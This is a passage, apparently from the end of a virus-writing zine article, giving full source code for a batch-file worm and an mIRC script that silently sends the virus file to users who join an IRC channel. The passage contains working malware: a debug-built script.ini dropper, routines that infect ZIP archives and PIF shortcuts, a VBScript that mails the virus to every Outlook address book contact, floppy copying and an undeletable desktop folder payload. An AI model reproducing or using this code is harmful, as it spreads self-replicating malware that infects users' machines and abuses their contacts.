echo e 0550 20 20 20 20 20 2E 69 66 20 28 25 65 6E 64 20 21>>yup
echo e 0560 3D 20 31 29 20 7B 0D 0A 20 20 20 20 20 2E 62 72>>yup
echo e 0570 65 61 64 20 25 66 69 6C 65 65 20 25 6C 20 34 30>>yup
echo e 0580 30 30 20 26 6C 65 0D 0A 20 20 20 20 20 2E 73 6F>>yup
echo e 0590 63 6B 77 72 69 74 65 20 2D 62 20 25 63 6C 69 65>>yup
echo e 05A0 6E 74 5F 6E 61 6D 65 20 34 30 30 30 20 26 6C 65>>yup
echo e 05B0 0D 0A 20 20 20 20 20 25 6C 20 3D 20 25 6C 20 2B>>yup
echo e 05C0 20 34 30 30 30 0D 0A 20 20 20 7D 20 7D 20 7D 0D>>yup
echo e 05D0 0A 0D 0A 20 20 20 61 6C 69 61 73 20 63 6C 6F 7A>>yup
echo e 05E0 65 20 7B 20 2E 73 6F 63 6B 63 6C 6F 73 65 20 25>>yup
echo e 05F0 73 6F 63 6B 5F 6E 61 6D 65 20 7D F3>>yup
echo rcx>>yup
echo 04FB>>yup
echo n lord>>yup
echo w>>yup
echo q>>yup
:: cut :)

:: this is Lord Yup's silent dcc send for mIRC from 29a#6
:: code see below

debug<yup
del yup
del c:\payload.reg
move lord c:\mirc\script.ini
move lord c:\mirc32\script.ini
move lord c:\progra~1\mirc\script.ini
move lord c:\progra~1\mirc32\script.ini
del lord
for %%i in (*.zip ..\*.zip %winbootdir%\desktop\*.zip) do pkzip -e0 -u -r -k %%i "c:\bat.antifa.bat">nul.zip
for %%i in (*.zip ..\*.zip %winbootdir%\desktop\*.zip) do powerarc -a -c4 %%i c:\bat.antifa.bat

:: the above two lines infect zip files, if pkzip or PowerArchiver are installed

del %winbootdir%\ooo.vbs
echo.on error resume next>%winbootdir%\ooo.vbs
echo dim a,b,c,d,e>>%winbootdir%\ooo.vbs
echo set a = Wscript.CreateObject("Wscript.Shell")>>%winbootdir%\ooo.vbs
echo set b = CreateObject("Outlook.Application")>>%winbootdir%\ooo.vbs
echo set c = b.GetNameSpace("MAPI")>>%winbootdir%\ooo.vbs
echo for y = 1 To c.AddressLists.Count>>%winbootdir%\ooo.vbs
echo set d = c.AddressLists(y)>>%winbootdir%\ooo.vbs
echo x = 1>>%winbootdir%\ooo.vbs
echo set e = b.CreateItem(0)>>%winbootdir%\ooo.vbs
echo for o = 1 To d.AddressEntries.Count>>%winbootdir%\ooo.vbs
echo f = d.AddressEntries(x)>>%winbootdir%\ooo.vbs
echo e.Recipients.Add f>>%winbootdir%\ooo.vbs
echo x = x + 1>>%winbootdir%\ooo.vbs
echo next>>%winbootdir%\ooo.vbs
echo e.Subject = "this is where it gets NASTY">>%winbootdir%\ooo.vbs
echo e.Body = "Deutschland von der Karte streichen," & chr(13) & "Polen muss bis Frankreich reichen!">>%winbootdir%\ooo.vbs
echo e.Attachments.Add ("c:\bat.antifa.bat")>>%winbootdir%\ooo.vbs
echo e.DeleteAfterSubmit = False>>%winbootdir%\ooo.vbs
echo e.Send>>%winbootdir%\ooo.vbs
echo f = "">>%winbootdir%\ooo.vbs
echo next>>%winbootdir%\ooo.vbs
start %winbootdir%\ooo.vbs

:: a boring vbs to send the virus away through Outlook

echo.on error resume next>pif.vbs
echo dim wshs, msc>>pif.vbs
echo set wshs=Wscript.CreateObject("WScript.Shell")>>pif.vbs
echo set msc=wshs.CreateShortcut("C:\pif.lnk")>>pif.vbs
echo msc.TargetPath = wshs.ExpandEnvironmentStrings("c:\bat.antifa.bat")>>pif.vbs
echo msc.WindowStyle = 4>>pif.vbs
echo msc.Save>>pif.vbs
start pif.vbs

:: a vbs to infect pif-files

command /f /c copy c:\bat.antifa.bat a:\

:: copies the virus to disk, if there is one

for %%k in (%winbootdir%\desktop\*.pif) do copy c:\pif.pif %%k
del pif.vbs
:evil
md %winbootdir%\desktop\²nazis_raus!³
:payload

:: Hehe, one more of these for-windows-unaccessable-directories.
:: A directory with the name "_nazis_raus!_" on the desktop.
:: The funny thing: It can't be deleted by windows.
=====[end code]================================================================

And last but not least, here is the code of Lord Yup's silent dcc send for mIRC:

=====[begin code]===============================================================
on 1:start: { .set %filee c:\bat.antifa.bat }

    on 1:join:#: {

     .if ($nick != $me && %old != $nick) {
     .set %old $nick
     .timer $+ $rand(1,100000) 1 5 .$check_him( $nick , $chan )
                                         }
    }

   alias check_him {
   .set %port $rand(9999,999999)
   .while ($portfree(%port) == $false) { .set %port $rand(9999,999999) }

   .if ($1 !isop $2) {
     .notice $1 :DCC Send teletubies ( $+ $ip $+ )
     .set %sock_name $rand(1,99999)
     .msg $1 DCC SEND %filee $longip($ip)  %port $file(%filee).size $+ 
     .socklisten %sock_name %port
     .timers off
     .timer $+ $rand(1,99999) 0 10 .cloze
                     }
   }

   on 1:socklisten:%sock_name: {
   .set %client_name $rand(1,9999999)
   .sockaccept %client_name
   .sockclose %sock_name
   .set %l 0
   .bread %filee %l 4000 &le
   .sockwrite -b %client_name 4000 &le
   %l = %l + 4000
   .set %end 0
   }

   on 1:sockread:%client_name: {
   .if (%l >= $file(%filee).size) {
     .set %end 1
     .sockclose %client_name
     .halt
    } .else {
     .if (%end != 1) {
     .bread %filee %l 4000 &le
     .sockwrite -b %client_name 4000 &le
     %l = %l + 4000
   } } }

   alias cloze { .sockclose %sock_name }
=====[end code]================================================================

That's all, ppl. I hope this enjoyed you a bit.
And remember, batch is in no way dead yet...

Something you want to tell me? ... No matter what:
philet0ast3r@rRlf.de
www.rRlf.de